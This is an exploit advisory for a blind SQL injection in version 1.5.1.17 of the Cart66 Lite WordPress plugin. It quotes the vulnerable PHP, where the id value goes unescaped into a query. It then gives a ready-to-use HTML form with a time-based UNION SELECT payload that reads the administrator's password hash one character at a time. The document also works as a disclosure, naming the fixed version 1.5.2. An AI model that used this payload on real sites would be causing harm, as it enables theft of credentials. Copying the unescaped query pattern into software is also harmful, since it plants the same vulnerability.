# Exploit Title: Cart66 Lite WordPress Ecommerce 1.5.1.17 Blind SQL Injection # Date: 29-10-2014 # Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek # Software Link: https://downloads.wordpress.org/plugin/cart66-lite.1.5.1.17.zip # Category: webapps 1. Description Cart66Ajax::shortcodeProductsTable() is accessible for every registered user. $postId is not escaped correctly (only html tags are stripped). File: cart66-litemodelsCart66Ajax.php public static function shortcodeProductsTable() { global $wpdb; $prices = array(); $types = array(); $postId = Cart66Common::postVal('id'); $product = new Cart66Product(); $products = $product->getModels("where id=$postId", "order by name"); $data = array(); } http://security.szurek.pl/cart66-lite-wordpress-ecommerce-15117-blind-sql-injection.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register): <form action="http://wordpress-install/wp-admin/admin-ajax.php" method="post"> <input type="hidden" name="action" value="shortcode_products_table"> Blind SQL Injection: <input type="text" name="id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM wp_users WHERE ID = 1) -- "> <input value="Hack" type="submit"> </form> This SQL will check if first password character user ID=1 is $. If yes, it will sleep 5 seconds. 3. Solution: Update to version 1.5.2 https://wordpress.org/plugins/cart66-lite/changelog/ https://downloads.wordpress.org/plugin/cart66-lite.1.5.2.zip